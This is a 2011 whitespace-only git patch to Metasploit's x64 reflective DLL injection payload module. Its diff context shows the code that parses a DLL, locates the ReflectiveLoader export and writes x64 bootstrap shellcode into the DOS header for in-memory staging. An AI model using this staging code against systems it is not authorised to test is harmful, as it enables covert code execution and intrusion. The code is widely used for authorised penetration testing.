From 441c5a22abcf1565c2efad54724104fa0078ebd6 Mon Sep 17 00:00:00 2001 From: James Lee Date: Sun, 20 Nov 2011 12:00:07 +1100 Subject: [PATCH] more spaces at EOL --- .../windows/x64/reflectivedllinject.rb | 40 +++++++++---------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb index b6569a1be3..8dead1bd56 100644 --- a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb +++ b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb @@ -25,20 +25,20 @@ module Payload::Windows::ReflectiveDllInject_x64 'References' => [ [ 'URL', 'http://www.harmonysecurity.com/ReflectiveDllInjection.html' ] ], 'Platform' => 'win', 'Arch' => ARCH_X86_64, - 'PayloadCompat' => - { + 'PayloadCompat' => + { 'Convention' => 'sockrdi' }, - 'Stage' => - { - 'Offsets' => - { - 'EXITFUNC' => [ 47, 'V' ] - }, - 'Payload' => "" + 'Stage' => + { + 'Offsets' => + { + 'EXITFUNC' => [ 47, 'V' ] + }, + 'Payload' => "" } )) - + register_options( [ OptPath.new( 'DLL', [ true, "The local path to the Reflective DLL to upload" ] ), ], self.class ) end @@ -49,12 +49,12 @@ module Payload::Windows::ReflectiveDllInject_x64 def stage_payload dll = "" offset = 0 - + begin ::File.open( library_path, "rb" ) { |f| dll += f.read(f.stat.size) } pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) - + pe.exports.entries.each do |entry| if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) offset = pe.rva_to_file_offset( entry.rva ) @@ -62,21 +62,21 @@ module Payload::Windows::ReflectiveDllInject_x64 end end - raise "Can't find an exported ReflectiveLoader function!" if offset == 0 + raise "Can't find an exported ReflectiveLoader function!" if offset == 0 rescue print_error( "Failed to read and parse Dll file: #{$!}" ) return end - + exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration - + bootstrap = "\x4D\x5A" + # pop r10 ; pop r10 = 'MZ' "\x41\x52" + # push r10 ; push r10 back "\x55" + # push rbp ; save ebp "\x48\x89\xE5" + # mov rbp, rsp ; setup fresh stack frame "\x48\x81\xEC\x20\x00\x00\x00" + # sub rsp, 32 ; alloc some space for calls "\x48\x8D\x1D\xEA\xFF\xFF\xFF" + # lea rbx, [rel+0] ; get virtual address for the start of this stub - "\x48\x81\xC3" + [offset].pack( "V" ) + # add rbx, 0x???????? ; add offset to ReflectiveLoader + "\x48\x81\xC3" + [offset].pack( "V" ) + # add rbx, 0x???????? ; add offset to ReflectiveLoader "\xFF\xD3" + # call rbx ; call ReflectiveLoader() "\x48\x89\xC3" + # mov rbx, rax ; save DllMain for second call "\x49\x89\xF8" + # mov r8, rdi ; R8 = our socket @@ -88,21 +88,21 @@ module Payload::Windows::ReflectiveDllInject_x64 "\x5A" + # pop rdx ; signal we have detached "\xFF\xD3" # call rbx ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk ) # the DOS headers e_lfanew entry will begin here at offset 64. - + # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry if( bootstrap.length > 62 ) print_error( "Reflective Dll Injection (x64) generated an oversized bootstrap!" ) return end - + # patch the bootstrap code into the dll's DOS header... dll[ 0, bootstrap.length ] = bootstrap # return our stage to be loaded by the intermediate stager return dll end - + end -end +end